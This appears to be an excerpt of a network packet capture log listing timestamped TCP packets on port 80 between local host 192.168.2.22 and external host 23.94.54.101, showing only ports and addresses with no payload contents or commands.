May 4, 2024 10:02:39.820447922 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820460081 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820472002 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820472956 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820486069 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820497036 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820497990 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820511103 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820518970 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820524931 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820537090 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820544004 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820549965 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820563078 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820575953 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820573092 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820589066 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820600033 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820601940 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820616961 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820621014 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820630074 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820643902 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820652962 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.820657015 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.820678949 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.822273016 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842109919 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842125893 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842139006 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842226982 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842251062 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842264891 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842277050 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842289925 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842303991 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842307091 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842317104 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842324018 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842329979 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842354059 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842405081 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842417002 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842427969 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842442036 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842448950 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842456102 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842468977 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842480898 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842482090 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842494965 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842506886 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842510939 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842524052 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842534065 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842538118 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842550039 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842561007 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842566967 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842581034 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842593908 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842592955 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842613935 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842628956 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842641115 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842659950 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842669010 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842673063 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842685938 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842698097 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842699051 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842710018 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842720985 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842721939 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842734098 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842751980 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842751980 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842765093 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842770100 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842777967 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842791080 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842802048 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842829943 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842844963 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842856884 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842869997 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842881918 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842885017 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842895985 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842912912 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842930079 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842941999 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842955112 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842967987 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.842968941 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.842979908 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843000889 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843056917 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843070030 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843082905 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843095064 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843096972 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843111992 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843130112 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843137980 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843142986 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843156099 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843168020 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843169928 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843190908 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843204975 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843218088 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843230009 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843240976 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843245029 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843266010 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843404055 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843416929 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843429089 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843439102 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843446016 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843458891 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843465090 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843471050 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843482018 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843492985 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843494892 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843509912 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843518972 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843523979 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843535900 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843543053 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843549013 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843560934 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843571901 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843574047 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843585968 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843595982 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843599081 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843610048 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843621016 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843621016 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843633890 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843641996 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843647003 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843660116 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:39.843663931 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.843693972 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:39.885113001 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026448965 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026479959 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026494980 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026510000 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026524067 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026587963 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026602983 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026662111 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026675940 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026690006 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026719093 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026719093 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026719093 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026750088 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026798010 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026809931 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026835918 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026843071 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026849031 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026861906 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026875973 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026880026 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026890039 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026896954 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026904106 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026917934 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026931047 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026933908 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026949883 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.026957035 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.026984930 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027064085 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027076960 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027092934 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027106047 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027107000 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027120113 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027133942 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027146101 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027147055 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027163029 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027170897 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027177095 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027189970 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027204037 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027205944 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027220011 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027228117 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027236938 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027252913 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027262926 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027267933 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027282953 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027292013 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027297020 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027309895 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027324915 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027329922 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027337074 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027355909 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027359962 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027369976 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027384043 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027390003 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027404070 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027417898 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027430058 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027436018 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027450085 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027458906 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027462959 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027477026 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027484894 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027493954 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027508974 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027519941 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027523994 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027538061 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027544022 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027553082 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027570009 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027584076 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027585983 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027600050 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027611017 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027617931 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027631044 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027638912 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027645111 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027658939 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027668953 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027673960 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027687073 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027698994 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027700901 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027715921 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027721882 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027729988 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027755022 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027787924 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027801037 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027813911 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027827024 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027832031 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027841091 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027854919 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027863026 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027890921 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027928114 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027940035 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027954102 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027967930 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027977943 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.027982950 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.027998924 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028012037 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028023958 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028023958 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028038025 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028045893 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028052092 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028058052 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028068066 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028083086 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028093100 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028095007 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028115988 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028120995 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028130054 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028146029 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028152943 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028158903 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028172970 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028184891 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028187990 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028202057 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028208017 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028212070 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028214931 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028222084 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028229952 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028258085 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028273106 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028287888 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028290033 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028301954 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028316021 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028331995 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028331995 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028358936 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028362036 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028376102 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028389931 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028403044 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028404951 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028418064 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028424025 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028458118 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028547049 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028559923 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028573036 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028587103 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028598070 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028599977 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028614044 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028621912 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028630972 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028644085 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028656006 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028657913 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028671980 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028680086 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028686047 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028698921 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028709888 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028713942 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028728008 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028733969 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028742075 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028754950 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028768063 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028773069 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028781891 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028793097 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028795958 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028809071 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028817892 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028822899 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028836966 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028850079 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028851032 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028866053 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028872967 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028878927 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028891087 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028901100 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028903961 CEST	80	49161	23.94.54.101	192.168.2.22
May 4, 2024 10:02:40.028917074 CEST	49161	80	192.168.2.22	23.94.54.101
May 4, 2024 10:02:40.028917074 CEST	49161	80	192.168.2.22	23.94.54.101
